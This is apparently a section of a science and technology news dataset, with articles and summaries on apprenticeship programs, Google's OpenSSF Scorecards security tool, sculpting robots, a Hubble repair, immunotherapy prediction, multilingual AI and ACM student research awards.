University of Washington and other area institutions that suit their needs. Zhang, who reenrolled in college in the fall of 2019, plans to become a certified nursing assistant or licensed practical nurse, in-demand occupations that would increase her earnings and enable her to take on more complex, interesting work. "The more I know, the more I can contribute to the patients and coworkers at my job," Zhang said. "It's really a lot for people who have a family and have work to go back to school. It's not easy, but for me, I'm really grateful." Worker shortages are particularly acute in tech, where companies compete for workers who can take their skills anywhere. But technological proficiency isn't a priority only in Silicon Valley, said CompTIA's Kardel, whose employer is working with the U.S. Department of Labor to promote on-the-job learning. Employers who rely on technology - a group that includes most manufacturers, many retailers and the government - are chasing the same workers. "Tech is not only a vertical, it's horizontal," Kardel said. "These jobs are part of companies we all rely on every day." Ticking through the positions IBM looks to fill with trainees, Kelli Jordan, IBM's director of career and skills, borrowed a phrase coined five years ago by a former IBM CEO: " new-collar jobs ." The company is looking for employees who can take on white-collar work that doesn't, or shouldn't, require a four-year degree. The necessary learning happens on the job. IBM aims to hire more than 400 trainees each year, putting them on 25 different training tracks, from software development to data science to human resources, Jordan said. IBM retains about 90 percent of participants in the program, which has cost the company $65 million since 2018. Like many in its industry, IBM is advocating for the National Apprenticeship Act , which would inject $3.5 billion in federal support for Department of Labor-registered programs like these. The legislation passed the House of Representatives with broad support but has not come up for a vote in the Senate. As IBM measures it , the federal government puts forward $130 billion annually in grants, loans, and other benefits to undergraduate students pursuing bachelor's and other higher education degrees - spending that, in the company's view, no longer meets the needs of the digital economy. Programs that pay trainees to learn "are so critically important when we think about making good, well-paying jobs accessible to everybody," Jordan said. "And for companies, it's not something that is insurmountable." Haruza, the IBM trainee, is learning database management during the days. He's still chipping away at his bachelor's degree in the evenings - mostly to put off having to pay back his student loans. Haruza doesn't think the college degree will be particularly useful, and doesn't see why anyone would need one in a field that requires regular retraining anyway. "I hope education changes to something that's actually beneficial to people," Haruza said, "and can actually get them jobs." This story about paid training programs was produced by The Hechinger Report , a nonprofit, independent news organization focused on inequality and innovation in education. Sign up for the Hechinger newsletter .
Technology companies are working to address a shortage of qualified talent. IBM, for instance, is offering a two-year program for entry-level workers without college degrees, providing classroom instruction and on-the-job training for in-demand positions it has difficulty filling. CompTIA's Amy Kardel said, "Earn-and-learn strategies can open a door for someone into a career quickly." The IT trade association is working to promote on-the-job learning with the U.S. Department of Labor. Kardel said employers who depend on technology, including manufacturers, retailers, and the government, are competing with Silicon Valley for the same workers. IBM, which is looking to hire over 400 trainees annually, offers 25 different training tracks, including software development, data science, and human resources. The company retains about 90% of participants. IBM's Kelli Jordan said the company is offering "new-collar jobs," white-collar work that does not require a four-year degree but offers necessary learning on the job.
[]
[]
[]
scitechnews
None
None
None
None
Technology companies are working to address a shortage of qualified talent. IBM, for instance, is offering a two-year program for entry-level workers without college degrees, providing classroom instruction and on-the-job training for in-demand positions it has difficulty filling. CompTIA's Amy Kardel said, "Earn-and-learn strategies can open a door for someone into a career quickly." The IT trade association is working to promote on-the-job learning with the U.S. Department of Labor. Kardel said employers who depend on technology, including manufacturers, retailers, and the government, are competing with Silicon Valley for the same workers. IBM, which is looking to hire over 400 trainees annually, offers 25 different training tracks, including software development, data science, and human resources. The company retains about 90% of participants. IBM's Kelli Jordan said the company is offering "new-collar jobs," white-collar work that does not require a four-year degree but offers necessary learning on the job. Arriving in Columbia, Missouri, at 18, Mateusz Haruza saw the University of Missouri as a stepping stone to a career in tech. When the dean's list student came out to his parents, they withdrew their financial support, and Haruza began struggling academically. He dropped out of college and started working at a UPS Store while running up credit card debt and stringing out his college loans. He'd hit "absolute rock bottom." Last year, friends guided Haruza to a fledgling IBM program that pays new workers as they receive classroom instruction and on-the-job training - no college degree needed. That kind of recruiting was a relatively new solution for IBM and other companies that generally require bachelor's degrees for entry-level white-collar workers. Now, strapped for talent, an increasing number of employers are reconsidering degree requirements and adopting training systems more common in blue-collar trades. Haruza, now 27, is six months into IBM's two-year program, and said it's a supportive environment that feels like family. That's a feeling IBM is trying to grow. While claims of low-wage worker shortages have received considerable pushback , there's broad consensus that some sectors of the economy - technology , health care and tech-adjacent businesses such as insurance - face a genuine dearth of qualified talent . Programs like IBM's have been promoted as having so much potential to address this issue that Congress's research arm recommended requiring employers to offer them, or to be taxed to pay for them. While being paid to train is hardly a new idea, it can be effective on multiple levels. Workers find more rewarding careers while employers enjoy a deeper talent pool, said Amy Kardel of CompTIA, an information technology trade association. People hired through the programs also tend to stay on the job longer; such programs can also broaden a company's culture by attracting employees, including workers of color, whose life experiences are outside the high school-to-college career arc common in white-collar workplaces. "Earn-and-learn strategies can open a door for someone into a career quickly," said Kardel, CompTIA's vice president for strategic workforce relationships. Just one in 300 American workers have participated in a formalized on-the-job training program, a rate less than one-tenth of that in much of western Europe . This despite increased attention here to the white-collar version of the kind of apprenticeship models that remain a staple of the unionized building trades. Still, being paid to train is becoming more common in the United States. The U.S. Department of Labor statistics shows a 70 percent increase in paid apprenticeships during the past decade . Aon, a London-based insurance giant, opened its U.S. earn-and-learn program in 2017, launching a 26-student class to its North American headquarters in Chicago. It has since joined with other Chicago businesses and community colleges to bring on more than 1,000 employee trainees around the city, and expanded its program to Aon offices around the country. Aon trainees join a career track - technology or finance, generally - while working with mentors on the job and taking community college classes. They're paid a full-time wage, taking on tasks previously done by recent university or college graduates. This shift to structured training also enables Aon to inject new diversity - in race, in gender and in life experience - into its business. Bridget Gainer, Aon's chief commercial officer, said the company is stronger for it. "Look, we're in the risk business," Gainer said. "Being able to determine risk takes all types of thought." When looking for talent, Aon recruiters had been turning to the Big Ten universities, Gainer said. Overlooked were institutions like the one Gainer sees from her office window: Harold Washington College, one of the City Colleges of Chicago. That's where Juawana Allen found Aon, by way of a flyer in the library advertising the Aon program. Allen had been working as a nanny and in retail while going to school full time. Her aim then was a law degree. A meeting with an Aon recruiter changed her course. "They were looking for people who were eager to learn and hungry for opportunity," said Allen, 23. "I'm extremely ambitious, and this lined up exactly with what I wanted to do." Joining the company's third trainee class, Allen was paid to split her hours between on-the-job training and classroom instruction provided at Harold Washington. The days were long - Allen and others regularly started work at 9 a.m. before heading to classes that wrapped up around 9 p.m. - but Allen made it through, graduating in December 2020. She now works in reinsurance in the company's Dallas office. Allen aspires to be one of the first women of color in a leadership role at Aon. If she succeeds, she will deliver on one of Gainer's hopes: to improve diversity in senior positions. The insurance industry, like most industries , is disproportionately white and male at the management level. "As a business community, we need to do a better job of diversifying our workforce, full stop," Gainer said. "If you don't address it at the entry level, you're abdicating your responsibility to actually make a change." Another set of employers - America's hospitals and clinics - have long relied on women and people of color to fill their ranks. They are chronically short on staff nonetheless. To address that shortfall in Washington, a training organization run by the state's largest hospitals and their biggest labor union provides a tuition assistance program that will pay the way for hospital employees to advance their educations in health-related fields. "We'll pay for their AA, their BA, their MBA, their PhD, the whole nine yards," said Laura Hopkins, executive director at SEIU Healthcare 1199NW Multi-Employer Training and Education Fund. "You don't have to have a dime in your pocket and you can get your education." Seven years ago, Eva Zhang was a waitress at a suburban Seattle sushi restaurant. Today, thanks to the training fund, she's being paid to become a nurse. Raised in Hubei, China, Zhang moved to the United States with her eldest son and then-husband when she was 24. She spent her first decade working in restaurants before deciding she wanted more growth and better benefits, especially for retirement. She enrolled at a small technical school just outside Seattle to become a medical assistant. The program was overwhelming - she was working full time and raising a family - but she graduated in 2015, at a cost of $10,000. Her starting wage - $16 an hour - hardly justified that investment. She was making less than she had at the sushi restaurant, where she continued to work on weekends. But the job qualified her for a no-cost education program run jointly by her employer and her union. Modeled on programs in New York State and elsewhere, the Washington initiative guides workers to courses of study at the University of Washington and other area institutions that suit their needs. Zhang, who reenrolled in college in the fall of 2019, plans to become a certified nursing assistant or licensed practical nurse, in-demand occupations that would increase her earnings and enable her to take on more complex, interesting work. "The more I know, the more I can contribute to the patients and coworkers at my job," Zhang said. "It's really a lot for people who have a family and have work to go back to school. It's not easy, but for me, I'm really grateful." Worker shortages are particularly acute in tech, where companies compete for workers who can take their skills anywhere. But technological proficiency isn't a priority only in Silicon Valley, said CompTIA's Kardel, whose employer is working with the U.S. Department of Labor to promote on-the-job learning. Employers who rely on technology - a group that includes most manufacturers, many retailers and the government - are chasing the same workers. "Tech is not only a vertical, it's horizontal," Kardel said. "These jobs are part of companies we all rely on every day." Ticking through the positions IBM looks to fill with trainees, Kelli Jordan, IBM's director of career and skills, borrowed a phrase coined five years ago by a former IBM CEO: " new-collar jobs ." The company is looking for employees who can take on white-collar work that doesn't, or shouldn't, require a four-year degree. The necessary learning happens on the job. IBM aims to hire more than 400 trainees each year, putting them on 25 different training tracks, from software development to data science to human resources, Jordan said. IBM retains about 90 percent of participants in the program, which has cost the company $65 million since 2018. Like many in its industry, IBM is advocating for the National Apprenticeship Act , which would inject $3.5 billion in federal support for Department of Labor-registered programs like these. The legislation passed the House of Representatives with broad support but has not come up for a vote in the Senate. As IBM measures it , the federal government puts forward $130 billion annually in grants, loans, and other benefits to undergraduate students pursuing bachelor's and other higher education degrees - spending that, in the company's view, no longer meets the needs of the digital economy. Programs that pay trainees to learn "are so critically important when we think about making good, well-paying jobs accessible to everybody," Jordan said. "And for companies, it's not something that is insurmountable." Haruza, the IBM trainee, is learning database management during the days. He's still chipping away at his bachelor's degree in the evenings - mostly to put off having to pay back his student loans. Haruza doesn't think the college degree will be particularly useful, and doesn't see why anyone would need one in a field that requires regular retraining anyway. "I hope education changes to something that's actually beneficial to people," Haruza said, "and can actually get them jobs." This story about paid training programs was produced by The Hechinger Report , a nonprofit, independent news organization focused on inequality and innovation in education. Sign up for the Hechinger newsletter .
146
Google Releases Open Source Security Software Program: Scorecards
Some naive people may still think they're not using open-source software. They're wrong. Everyone does. According to the Synopsys Cybersecurity Research Center (CyRC) 2021 "Open Source Security and Risk Analysis" (OSSRA) report , 95% of all commercial programs contain open-source software. By CyRC's count, the vast majority of that code contains outdated or insecure code. But how can you tell which libraries and other components are safe without doing a deep code dive? Google and the Open Source Security Foundation (OSSF) have a quick and easy answer: The OpenSSF Security Scorecards . These Scorecards are based on a set of automated pass/fail checks to provide a quick review of many open-source software projects. The Scorecards project is an automated security tool that produces a "risk score" for open-source programs. That's important because only some organizations have systems and processes in place to check new open-source dependencies for security problems. Even at Google, though, with all its resources, this process is often tedious, manual, and error-prone. Worse still, many of these projects and developers are resource-constrained. The result? Security often ends up a low priority on the task list. This leads to critical projects not following good security best practices and becoming vulnerable to exploits. The Scorecards project hopes to make security checks easier to make security easier to achieve with the release of Scorecards v2 . This includes new security checks, scaled up the number of projects being scored, and made this data easily accessible for analysis. For developers, Scorecards help reduce the toil and manual effort required to continually evaluate changing packages when maintaining a project's supply chain. Consumers can automatically access the risks to make informed decisions about accepting the program, look for an alternative solution, or work with the maintainers to make improvements. Here's what new: Identifying Risks: Since last fall, Scorecards' coverage has grown; the project has added several new checks, following Google's Know, Prevent, Fix framework . Spotting malicious contributors: Contributors with malicious intent or compromised accounts can introduce potential backdoors into code. Code reviews help mitigate such attacks. With the new Branch-Protection check, developers can verify that the project enforces mandatory code review from another developer before code is committed. Currently, this check can only be run by a repository admin due to GitHub API limitations. For a third-party repository, use the less informative Code-Review check instead. Vulnerable Code: Even with developers and peer review's best efforts, bad code can still enter a codebase and remain undetected. That's why it's important to enable continuous fuzzing and static code testing to catch bugs early in the development lifecycle. The project now checks to see if a project uses fuzzing and SAST tools as part of its continuous integration/continuous deployment (CI/CD) pipeline. Build system compromise: A common CI/CD solution used by GitHub projects is GitHub Actions . A danger with these action workflows is that they may handle untrusted user input. Meaning, an attacker can craft a malicious pull request to gain access to the privileged GitHub token, and with it the ability to push malicious code to the repo without review. To mitigate this risk, Scorecard's Token-Permissions prevention check now verifies that the GitHub workflows follow the principle of least privilege by making GitHub tokens read-only by default. Bad dependencies: A program is only as secure as its weakest dependency. This may sound obvious, but the first step to knowing our dependencies is simply to declare them... and have your dependencies declare them too. Armed with this provenance information, you can assess the risks to your programs and mitigate those risks. That's the good news. The bad news is there are several widely used anti-patterns that break this provenance principle. The first of these anti-patterns are checked-in binaries -- as there's no way to easily verify or check the contents of the binary in the project. Thanks in particular to the continued use of proprietary drivers, this may be an unavoidable evil. Still, Scorecards provides a Binary-Artifacts check for testing this. Another anti-pattern is the use of curl or bash in scripts, which dynamically pulls dependencies. Cryptographic hashes let us pin our dependencies to a known value. If this value ever changes, the build system detects it and refuses to build. Pinning dependencies is useful everywhere we have dependencies: Not just during compilation, but also in Dockerfiles, CI/CD workflows, etc. Scorecards checks for these anti-patterns with the Frozen-Deps check. This check is helpful for mitigating against malicious dependency attacks such as the recent CodeCov attack. Even with hash-pinning, hashes need to be updated once in a while when dependencies patch vulnerabilities. Tools like dependabot or renovatebot can review and update the hashes. The Scorecards Automated-Dependency-Update check verifies that developers rely on such tools to update their dependencies. It is important to know vulnerabilities in a project before using it as a dependency. Scorecards can provide this information via the new Vulnerabilities check, without subscribing to a vulnerability alert system. That's what new. Here is what the Scorecards project has done so far. It now has evaluated security for over 50,000 open source projects . To scale this project, its architecture has been massively redesigned. It now uses a Pub/Sub model. This gives it improved horizontal scalability and higher throughput. This fully automated tool periodically evaluates critical open source projects and exposes the Scorecards check information through weekly updated public BigQuery dataset To access this data, you can use the bq command-line tool . The following example shows how to export data for the Kubernetes project. For your purposes, substitute the Kubernetes repo url with the one for the program you need to check: $ bq query --nouse_legacy_sql 'SELECT Repo, Date, Checks FROM openssf.scorecardcron.scorecard_latest WHERE Repo=" github.com/kubernetes/kubernetes "' You can also see the latest data on all Scorecards analyzed projects . This data is also available in the new Google Open Source Insights project and the OpenSSF Security Metrics project . The raw data can also be examined via data analysis and visualization tools such as Google Data Studio . With the data in CSV format, you can examine it with whatever your favorite data analysis and visualization tool may be. One thing is clear from all this data. There's a lot of security gaps still to fill even in widely used packages such as Kubernetes . For example, many projects are not continuously fuzzed , don't define a security policy for reporting vulnerabilities, and don't pin dependencies. According to Google, and frankly, anyone who cares about security: "We all need to come together as an industry to drive awareness of these widespread security risks, and to make improvements that will benefit everyone." As helpful as Scorecards v2 is, much more work remains to be done. The project now has 23 developers, more would be welcomed. If you would like to join the fun, check out these good first-timer issues . These are all accessible via GitHub . If you would like us to help you run Scorecards on specific projects, please submit a GitHub pull request to add them . Last but not least, Google's developers said, "We have a lot of ideas and many more checks we'd like to add , but we want to hear from you. Tell us which checks you would like to see in the next version of Scorecards." Looking ahead, the team plans to add: If I were you, I'd start using Scorecards immediately. This project can already make your work much safer and it promises to do even more to improve not only security for your programs but the programs it covers.
Google and the Open Source Security Foundation have developed the OpenSSF Security Scorecards, an automated security tool that generates a "risk score" for open source programs. This is important because 95% of all commercial programs contain open source software, according to the Synopsys Cybersecurity Research Center, and many organizations lack the systems and processes to evaluate new open source dependencies for security issues. Scorecards v2 includes new security checks, including the Branch-Protection check, which ensures code reviews to prevent malicious contributors from introducing potential backdoors into code. The Scorecards project already has performed security evaluations for more than 50,000 open source projects.
[]
[]
[]
scitechnews
None
None
None
None
Google and the Open Source Security Foundation have developed the OpenSSF Security Scorecards, an automated security tool that generates a "risk score" for open source programs. This is important because 95% of all commercial programs contain open source software, according to the Synopsys Cybersecurity Research Center, and many organizations lack the systems and processes to evaluate new open source dependencies for security issues. Scorecards v2 includes new security checks, including the Branch-Protection check, which ensures code reviews to prevent malicious contributors from introducing potential backdoors into code. The Scorecards project already has performed security evaluations for more than 50,000 open source projects. Some naive people may still think they're not using open-source software. They're wrong. Everyone does. According to the Synopsys Cybersecurity Research Center (CyRC) 2021 "Open Source Security and Risk Analysis" (OSSRA) report , 95% of all commercial programs contain open-source software. By CyRC's count, the vast majority of that code contains outdated or insecure code. But how can you tell which libraries and other components are safe without doing a deep code dive? Google and the Open Source Security Foundation (OSSF) have a quick and easy answer: The OpenSSF Security Scorecards . These Scorecards are based on a set of automated pass/fail checks to provide a quick review of many open-source software projects. The Scorecards project is an automated security tool that produces a "risk score" for open-source programs. That's important because only some organizations have systems and processes in place to check new open-source dependencies for security problems. Even at Google, though, with all its resources, this process is often tedious, manual, and error-prone. Worse still, many of these projects and developers are resource-constrained. The result? Security often ends up a low priority on the task list. This leads to critical projects not following good security best practices and becoming vulnerable to exploits. The Scorecards project hopes to make security checks easier to make security easier to achieve with the release of Scorecards v2 . This includes new security checks, scaled up the number of projects being scored, and made this data easily accessible for analysis. For developers, Scorecards help reduce the toil and manual effort required to continually evaluate changing packages when maintaining a project's supply chain. Consumers can automatically access the risks to make informed decisions about accepting the program, look for an alternative solution, or work with the maintainers to make improvements. Here's what new: Identifying Risks: Since last fall, Scorecards' coverage has grown; the project has added several new checks, following Google's Know, Prevent, Fix framework . Spotting malicious contributors: Contributors with malicious intent or compromised accounts can introduce potential backdoors into code. Code reviews help mitigate such attacks. With the new Branch-Protection check, developers can verify that the project enforces mandatory code review from another developer before code is committed. Currently, this check can only be run by a repository admin due to GitHub API limitations. For a third-party repository, use the less informative Code-Review check instead. Vulnerable Code: Even with developers and peer review's best efforts, bad code can still enter a codebase and remain undetected. That's why it's important to enable continuous fuzzing and static code testing to catch bugs early in the development lifecycle. The project now checks to see if a project uses fuzzing and SAST tools as part of its continuous integration/continuous deployment (CI/CD) pipeline. Build system compromise: A common CI/CD solution used by GitHub projects is GitHub Actions . A danger with these action workflows is that they may handle untrusted user input. Meaning, an attacker can craft a malicious pull request to gain access to the privileged GitHub token, and with it the ability to push malicious code to the repo without review. To mitigate this risk, Scorecard's Token-Permissions prevention check now verifies that the GitHub workflows follow the principle of least privilege by making GitHub tokens read-only by default. Bad dependencies: A program is only as secure as its weakest dependency. This may sound obvious, but the first step to knowing our dependencies is simply to declare them... and have your dependencies declare them too. Armed with this provenance information, you can assess the risks to your programs and mitigate those risks. That's the good news. The bad news is there are several widely used anti-patterns that break this provenance principle. The first of these anti-patterns are checked-in binaries -- as there's no way to easily verify or check the contents of the binary in the project. Thanks in particular to the continued use of proprietary drivers, this may be an unavoidable evil. Still, Scorecards provides a Binary-Artifacts check for testing this. Another anti-pattern is the use of curl or bash in scripts, which dynamically pulls dependencies. Cryptographic hashes let us pin our dependencies to a known value. If this value ever changes, the build system detects it and refuses to build. Pinning dependencies is useful everywhere we have dependencies: Not just during compilation, but also in Dockerfiles, CI/CD workflows, etc. Scorecards checks for these anti-patterns with the Frozen-Deps check. This check is helpful for mitigating against malicious dependency attacks such as the recent CodeCov attack. Even with hash-pinning, hashes need to be updated once in a while when dependencies patch vulnerabilities. Tools like dependabot or renovatebot can review and update the hashes. The Scorecards Automated-Dependency-Update check verifies that developers rely on such tools to update their dependencies. It is important to know vulnerabilities in a project before using it as a dependency. Scorecards can provide this information via the new Vulnerabilities check, without subscribing to a vulnerability alert system. That's what new. Here is what the Scorecards project has done so far. It now has evaluated security for over 50,000 open source projects . To scale this project, its architecture has been massively redesigned. It now uses a Pub/Sub model. This gives it improved horizontal scalability and higher throughput. This fully automated tool periodically evaluates critical open source projects and exposes the Scorecards check information through weekly updated public BigQuery dataset To access this data, you can use the bq command-line tool . The following example shows how to export data for the Kubernetes project. For your purposes, substitute the Kubernetes repo url with the one for the program you need to check: $ bq query --nouse_legacy_sql 'SELECT Repo, Date, Checks FROM openssf.scorecardcron.scorecard_latest WHERE Repo=" github.com/kubernetes/kubernetes "' You can also see the latest data on all Scorecards analyzed projects . This data is also available in the new Google Open Source Insights project and the OpenSSF Security Metrics project . The raw data can also be examined via data analysis and visualization tools such as Google Data Studio . With the data in CSV format, you can examine it with whatever your favorite data analysis and visualization tool may be. One thing is clear from all this data. There's a lot of security gaps still to fill even in widely used packages such as Kubernetes . For example, many projects are not continuously fuzzed , don't define a security policy for reporting vulnerabilities, and don't pin dependencies. According to Google, and frankly, anyone who cares about security: "We all need to come together as an industry to drive awareness of these widespread security risks, and to make improvements that will benefit everyone." As helpful as Scorecards v2 is, much more work remains to be done. The project now has 23 developers, more would be welcomed. If you would like to join the fun, check out these good first-timer issues . These are all accessible via GitHub . If you would like us to help you run Scorecards on specific projects, please submit a GitHub pull request to add them . Last but not least, Google's developers said, "We have a lot of ideas and many more checks we'd like to add , but we want to hear from you. Tell us which checks you would like to see in the next version of Scorecards." Looking ahead, the team plans to add: If I were you, I'd start using Scorecards immediately. This project can already make your work much safer and it promises to do even more to improve not only security for your programs but the programs it covers.
147
'We Don't Need Another Michelangelo': In Italy, It's Robots' Turn to Sculpt
Scientists at the Robotor laboratory in Carrara, Italy, are developing sculpting robots to keep the country on the artistic forefront. Robotor's Giacomo Massari said the continued prosperity of the Italian marble sculpture segment depends on discarding traditional manual techniques, especially since marble has fallen out of favor in artistic circles. Robotor's Michele Basaldella said many outstanding sculptors lack distinction because manual dexterity is frowned upon, but robots can create groundbreaking works if they are built "with an artistic sensitivity." The company's founders initially used robots from local technology companies, but started designing their own from homemade software and German parts when artist clients started ordering increasingly challenging commissions.
[]
[]
[]
scitechnews
None
None
None
None
Scientists at the Robotor laboratory in Carrara, Italy, are developing sculpting robots to keep the country on the artistic forefront. Robotor's Giacomo Massari said the continued prosperity of the Italian marble sculpture segment depends on discarding traditional manual techniques, especially since marble has fallen out of favor in artistic circles. Robotor's Michele Basaldella said many outstanding sculptors lack distinction because manual dexterity is frowned upon, but robots can create groundbreaking works if they are built "with an artistic sensitivity." The company's founders initially used robots from local technology companies, but started designing their own from homemade software and German parts when artist clients started ordering increasingly challenging commissions.
148
NASA Preps 'More Complex and Riskier' Hubble Space Telescope Fix
The U.S. National Aeronautics and Space Administration (NASA) hopes to correct a persistent issue with the Hubble Space Telescope's payload computer, in which commands to write into or read from memory are not going through. The agency is preparing to activate backup hardware that is part of the Science Instrument Command and Data Handling unit where the payload computer resides. The NASA team is considering a power regulator element, and hardware that transmits and formats commands and data. An agency update said if one of these components is the likely culprit, it will require a more complicated and riskier backup unit-switching procedure than previously attempted. The switchover will be conducted in a simulation prior to the actual attempt, and the process highlights the reality of working with aging systems that have long exceeded operational expectations.
[]
[]
[]
scitechnews
None
None
None
None
The U.S. National Aeronautics and Space Administration (NASA) hopes to correct a persistent issue with the Hubble Space Telescope's payload computer, in which commands to write into or read from memory are not going through. The agency is preparing to activate backup hardware that is part of the Science Instrument Command and Data Handling unit where the payload computer resides. The NASA team is considering a power regulator element, and hardware that transmits and formats commands and data. An agency update said if one of these components is the likely culprit, it will require a more complicated and riskier backup unit-switching procedure than previously attempted. The switchover will be conducted in a simulation prior to the actual attempt, and the process highlights the reality of working with aging systems that have long exceeded operational expectations.
149
ML Helps Predict When Immunotherapy Will Be Effective
When it comes to defense, the body relies on attack thanks to the lymphatic and immune systems. The immune system is like the body's own personal police force as it hunts down and eliminates pathogenic villains. "The body's immune system is very good at identifying cells that are acting strangely. These include cells that could develop into tumors or cancer in the future," says Federica Eduati from the department of Biomedical Engineering at TU/e. "Once detected, the immune system strikes and kills the cells." But it's not always so straightforward as tumor cells can develop ways to hide themselves from the immune system. "Unfortunately, tumor cells can block the natural immune response. Proteins on the surface of a tumor cell can turn off the immune cells and effectively put them in sleep mode," says Oscar Lapuente-Santana, PhD researcher in the Computational Biology group . Fortunately, there is a way to wake up the immune cells and restore their antitumor immunity, and it's based on immunotherapy.
Researchers at the Eindhoven University of Technology (TU/e) in the Netherlands have developed a machine learning model that can predict whether immunotherapy will work for a patient. One type of immunotherapy that involves immune checkpoint blockers (ICB) is effective in only a third of patients. The researchers used computational algorithms and datasets from previous clinical patient care to search the tumor microenvironment for biomarkers to predict patient response to ICB. TU/e's Federica Eduati said, "RNA-sequencing datasets are publicly available, but the information about which patients responded to ICB therapy is only available for a small subset of patients and cancer types." To solve the data problem, the researchers searched for substitute immune responses from the same datasets, which could be an indicator of ICB's effectiveness. Eduati said, "Our machine learning model outperforms biomarkers currently used in clinical settings to assess ICB treatments."
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the Eindhoven University of Technology (TU/e) in the Netherlands have developed a machine learning model that can predict whether immunotherapy will work for a patient. One type of immunotherapy that involves immune checkpoint blockers (ICB) is effective in only a third of patients. The researchers used computational algorithms and datasets from previous clinical patient care to search the tumor microenvironment for biomarkers to predict patient response to ICB. TU/e's Federica Eduati said, "RNA-sequencing datasets are publicly available, but the information about which patients responded to ICB therapy is only available for a small subset of patients and cancer types." To solve the data problem, the researchers searched for substitute immune responses from the same datasets, which could be an indicator of ICB's effectiveness. Eduati said, "Our machine learning model outperforms biomarkers currently used in clinical settings to assess ICB treatments." When it comes to defense, the body relies on attack thanks to the lymphatic and immune systems. The immune system is like the body's own personal police force as it hunts down and eliminates pathogenic villains. "The body's immune system is very good at identifying cells that are acting strangely. These include cells that could develop into tumors or cancer in the future," says Federica Eduati from the department of Biomedical Engineering at TU/e. "Once detected, the immune system strikes and kills the cells." But it's not always so straightforward as tumor cells can develop ways to hide themselves from the immune system. "Unfortunately, tumor cells can block the natural immune response. Proteins on the surface of a tumor cell can turn off the immune cells and effectively put them in sleep mode," says Oscar Lapuente-Santana, PhD researcher in the Computational Biology group . Fortunately, there is a way to wake up the immune cells and restore their antitumor immunity, and it's based on immunotherapy.
150
Meet the Scientist Teaching AI to Police Human Speech
Facebook and Google have engineered artificial intelligence (AI) systems capable of understanding dozens of languages with remarkable accuracy through the efforts of scientists like Alexis Conneau. At Facebook, Conneau and others advanced machine learning algorithms' ability to abstract language numerically, eventually training an AI model to piece through different languages concurrently; the 100-language XLM-R model was almost as accurate as its specialized single-language peers. Conneau's final work for Facebook was on wav2vec-U, an unsupervised speech-recognition system that reads words from audio. Conneau has helped lead research on natural language processing, and spearheaded work in AI that Facebook and others have applied to the online policing of bullying, bigotry, and hate speech. He believes this problem can be addressed only through automation, while critics claim such innovations will just give companies more information on Web users to exploit.
[]
[]
[]
scitechnews
None
None
None
None
Facebook and Google have engineered artificial intelligence (AI) systems capable of understanding dozens of languages with remarkable accuracy through the efforts of scientists like Alexis Conneau. At Facebook, Conneau and others advanced machine learning algorithms' ability to abstract language numerically, eventually training an AI model to piece through different languages concurrently; the 100-language XLM-R model was almost as accurate as its specialized single-language peers. Conneau's final work for Facebook was on wav2vec-U, an unsupervised speech-recognition system that reads words from audio. Conneau has helped lead research on natural language processing, and spearheaded work in AI that Facebook and others have applied to the online policing of bullying, bigotry, and hate speech. He believes this problem can be addressed only through automation, while critics claim such innovations will just give companies more information on Web users to exploit.
151
2021 ACM Student Research Competition Winners Announced
New York, NY, July 8, 2021 - The winners of the 2021 Grand Finals of the Association for Computing Machinery (ACM) Student Research Competition (SRC) were recently announced, culminating a year-long competition in which 296 computer science students presented research projects at 21 ACM conferences. Jiaqi Gu, University of Texas at Austin; Konstantinos Kallas, University of Pennsylvania; and Guyue Huang, Tsinghua University took the top three places among graduate students. Thomas B. McHugh, Northwestern University; Chuangtao Chen, Zhejiang University; and Rakshit Mittal, Birla Institute of Technology & Science took the top three spots among undergraduates. Microsoft sponsors the SRC by providing travel grants of $500 to allow exemplary computing students to attend and present their research at major ACM computing conferences around the world. Through the Student Research Competition, each participating student has the unique opportunity to attend conference sessions, gain a new understanding of the practical applications of computer science scholarship, and share their own research with other students, conference attendees and eminent scientists and practitioners. For most students, the ACM Student Research Competition is their introduction to participating in premier computing research conferences. "Despite the impact of the COVID pandemic, the ACM Student Research Competition celebrated another successful year," said ACM President Gabriele Kotsis. "The SRC opens up the world of professional computing research to students. As the organizers of the competition, we are always heartened to read the testimonials students write after the competition ends. A common thread that runs through all the testimonials is that participation in the competition is a memory that will stay with them. We also offer SRC participants Student Membership to ACM, which gives these young people access to a range of essential resources for learning and career development and keeps them connected with the broader computing community. We thank our friends at Microsoft for their ongoing support of the SRC." "We congratulate the Graduate and Undergraduate winners, as well as all who participated in this year's SRC," said Evelyne Viegas, Senior Director of Global Research Engagement at Microsoft Research. "Computing has become interwoven into almost every aspect of life and business. New innovations, brought about by computing research, will play an important role in addressing the challenges we will face in the coming years. The ACM Student Research Competition prepares students for the future contributions they will make. As active participants in the global research community, SRC students are given access to the world's top computing conferences that empower them to engage in dialogue and share their ideas before experts and peers." Judges assess each presenter's demonstrated knowledge, the caliber of student contributions to the research and the overall quality of their oral and visual presentations. The most successful student researchers move through the competition's stages. In the first stages, their research posters and presentations are evaluated for content and presentation. During the Grand Finals, the students share a written 4,000-word description of their work before the final step of the competition, when an entirely new panel of judges evaluates each student's complete body of work and selects the overall winners. The 2021 Student Winners: Graduate Category Undergraduate Category The ACM Student Research Competition (SRC) , sponsored by Microsoft, offers a unique forum for undergraduate and graduate students to present their original research at well-known ACM sponsored and co-sponsored conferences before a panel of judges and attendees. The SRC is s a joint venture of ACM and Microsoft, which has provided generous funding of $120,000 per competition year for this event since 2003. The top three undergraduate and graduate winners at each SRC receive prizes of $500, $300, and $200, respectively (USD), an award medal and a one-year complimentary ACM student membership with a subscription to ACM's Digital Library. ACM, the Association for Computing Machinery , is the world's largest educational and scientific computing society, uniting educators, researchers and professionals to inspire dialogue, share resources and address the field's challenges. ACM strengthens the computing profession's collective voice through strong leadership, promotion of the highest standards, and recognition of technical excellence. ACM supports the professional growth of its members by providing opportunities for life-long learning, career development, and professional networking.
ACM has announced the winners of the 2021 Grand Finals of its Student Research Competition (SRC), which involved 296 computer science students presenting projects at 21 ACM conferences. The University of Texas at Austin's Jiaqi Gu took first place in the graduate category for developing a method of tapping optical neural networks to facilitate efficient neuromorphic computing. Thomas B. McHugh of Northwestern University was ranked first in the undergraduate category for his project, "Constructing Agency and Usability Through Community-Driven Assistive Technology Design." Microsoft Research's Evelyne Viegas said, "The ACM Student Research Competition prepares students for the future contributions they will make. As active participants in the global research community, SRC students are given access to the world's top computing conferences that empower them to engage in dialogue and share their ideas before experts and peers."
[]
[]
[]
scitechnews
None
None
None
None
